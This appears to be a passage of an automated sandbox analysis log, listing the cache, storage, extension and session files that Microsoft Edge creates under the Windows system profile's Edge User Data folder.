    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\a14c0f62-50b6-4212-af3b-5b2b74bab812.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir\temp-index
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\449b6e7f-5636-42fd-8860-a4442803978d.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_2
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\519629a3-ef42-45a8-80a4-1ef3c9ab0f55.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_3
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF1f9767.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13381052068843973
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9a7e03ce51b814d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8180e3c3a78ecd22_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\0e0de3ce351f8e6b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\9626a09b54b19df2_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\d24b740d-fc22-49d9-84be-9b286ce41c73
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokens\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000002
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\000002.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT~RF1f9f17.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Network Action Predictor-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cd2169f8f5a992de_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Last Browser
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional Data-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_and_features_store\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-journal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Functional SAN Data-wal
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\EventDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\EntryDB\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\4c8cad45-196d-4217-b0ab-447e9c6b9df0.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b82c4dbbc2bbed92_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\2e0995500af195c4_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b931fc6ff8856876_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f0e758953c43c4db_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\4f7e5db733228f6d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\99ce8290e829e155_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\c9a14d49161c54bd_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fa00e0605e2f2a9a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\355018c0bc478789_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\29c4bbd1bfa0cc63_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b9e5d9eb48353eef_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\3a12ecbf3e43ece7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\be495402201abc59_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\fd9c59ef6bed1941_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\eac233f365c69025_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\038090926af56b05_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\373dd6c0efd32850_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\d8dd7116c41d75e8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\b430a46d5f8b883a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\6038c11eb2cee93f_0
